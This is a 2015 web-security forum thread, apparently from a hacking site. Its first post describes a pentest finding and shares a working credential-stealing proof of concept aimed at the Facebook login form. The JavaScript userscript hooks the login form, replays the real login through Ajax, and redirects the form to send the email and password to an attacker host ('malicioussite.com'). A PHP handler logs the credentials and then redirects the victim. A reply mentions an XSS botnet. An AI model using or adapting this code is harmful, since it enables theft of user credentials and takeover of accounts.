Frame Busting & SOP XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

Frame Busting & SOP XSS

Post by x509 on Mon Aug 17, 2015 7:47 pm
([msg=89393]see Frame Busting & SOP XSS[/msg])

In a recent pentest, I found a way to gain persistent XSS on the website login page. I found the client was using Frame Busting disallowing the use of iFrames. Typically in a scenario similar to this, one might simply create some JavaScript payload to snag the cookie data and send it off to be analyzed and used to duplicate the users session in what is typically referred to as a cookie hijacking attack. In most cases, the payload consists of grabbing the cookies and then loading an invisible iFrame in that page that points to some server which will handle the cookies. However, in this specific case, the iFrame could not be loaded on the page, and hell I didn't just want a session, I wanted legitimate credentials! The other big issue was Same Origin Policy, which mitigated a lot of my other attempts. So, I decided I would sit down and analyze what I wanted to do... I came to the conclusion that I could use Ajax to send requests to my server to handle the data. However, SOP got in my way, or maybe I just had it set up wrong... So, I thought a bit more, and came up with a working solution. I would monitor for a login submission and then use Ajax to send the request to the actual server it belongs to so that I don't have to fight with Same Origin Policy rules. The next thing I would do is modify the action of the form before it gets submitted and point that to my server instead, where my server logs the data and then redirects them back to Facebook (logged in). This will completely avoid Same Origin Policy and give me the desired results. The one downfall to this approach is that browsers may notify the user that the data is being sent through an insecure connection and could be sniffed in the event that your server is not SSL verified.

Anyway, time to get dirty and post some proof of concept. I redesigned this in conjunction with greasemonkey and Facebook as a proof of concept.
Greasemonkey Script: GIST LINK
Code: Select all
// ==UserScript==
// @name        Test
// @namespace   *
// @description Test
// @version     1
// @grant       none
// @include     http://*
// @include     https://*
// @require     http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js
// ==/UserScript==

var handler = "malicioussite.com/handler.php?data=" // Our server to handle the data passed as $_GET
var xform   = document.forms[0] // Just grab the first form (it's the login form in this case)
var action  = "/login.php?login_attempt=1" // Where the actual action should be of the form
var a_type  = "POST" // The action type of the form

// monitor for an onsubmit action of the login form
xform.onsubmit = function(){
  // Grab needed values (lsd is important here, as it's a XSRF token)
  email = xform.email.value;
  pass  = xform.pass.value;
  token = xform.lsd.value;
  perst = xform.default_persistent.value;

  // Prepare our array for the Ajax request
  formData = {email: email,
              pass: pass,
              lsd: token,
              default_persistent: perst,
             };
 
  data = email + ':' + pass; // What we want to pass to our server
  // Change the action to our server and make sure to encode the data
  // The server should decode this then use it, otherwise an ampersand splits our data
  // and we will not be able to view all of the data (i.e, a password of "lol&kek123" the server would only get "lol")
  xform.action = handler + encodeURIComponent(data);
  // Perform the Ajax call using jQuery (Don't judge me)
  $.ajax({
    url: action,
    type: a_type,
    data: formData
  });
}


Server Handling Data: GIST LINK
Code: Select all
<?php
  $data = urldecode($_GET['data']);
  /***
    Do something with data here (log it somehow)
  ***/
  // Make sure you redirect them
  header('Location: https://www.facebook.com/');
?>


The warning: (This will appear if you do not have SSL enabled)
Image

Anyway, many people will click continue and go about their way ;)
Does anyone know of any other great alternatives, assuming you are in the same situation?

I have verified that the error message does not appear when sending it over an SSL enabled site.
User avatar
x509
New User
New User
 
Posts: 16
Joined: Sun Aug 09, 2015 1:47 am
Blog: View Blog (0)


Re: Frame Busting & SOP XSS

Post by tgoe on Tue Aug 18, 2015 8:35 pm
([msg=89412]see Re: Frame Busting & SOP XSS[/msg])

I really like the idea of a web app built upon the collective power of everyone with a tab open.

I thought Ravan was cool when it launched :)

A long time ago I wrote an xss botnet, the beginnings of which are here:
https://www.hackthissite.org/forums/viewtopic.php?f=24&t=4144&start=10#p29869
https://www.hackthissite.org/forums/viewtopic.php?f=104&t=4212&p=30219

Anyway, I don't like your poc. You need to factor out greasemonkey, facebook and jquery. Maybe WebRTC will save us all.
User avatar
tgoe
Contributor
Contributor
 
Posts: 718
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)



Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests